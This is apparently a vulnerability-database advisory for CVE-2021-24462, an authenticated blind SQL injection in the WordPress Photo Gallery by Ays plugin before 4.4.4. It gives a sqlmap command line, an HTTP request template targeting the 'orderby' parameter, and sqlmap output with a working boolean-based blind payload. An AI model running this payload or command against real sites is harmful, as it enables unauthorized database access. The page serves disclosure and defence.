Plugin "Photo Gallery" by Ays < 4.4.4 Authenticated Blind SQL Injection
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
![]() | CVE-2021-24462 | 2 Aug 202111:15 | – | nvd |
![]() | CVE-2021-24462 | 2 Aug 202111:15 | – | cve |
![]() | Sql injection | 2 Aug 202111:15 | – | prion |
![]() | CVE-2021-24462 Photo Gallery by Ays - Responsive Image Gallery < 4.4.4 - Authenticated Blind SQL Injections | 2 Aug 202110:32 | – | cvelist |
![]() | WordPress Photo Gallery by Ays plugin <= 4.4.3 - Authenticated Blind SQL Injection (SQLi) vulnerability | 29 Jun 202100:00 | – | patchstack |
![]() | Photo Gallery by Ays - Responsive Image Gallery < 4.4.4 - Authenticated Blind SQL Injections | 29 Jun 202100:00 | – | wpvulndb |
SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs
With r.txt is GET OR POST requests to sort item in plugin Menu.
GET /wp-admin/admin.php?page=.........&orderby=id--&order=desc HTTP/1.1
Host: ...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ...
Upgrade-Insecure-Requests: 1
SQLMAP OUTPUT:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=............&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo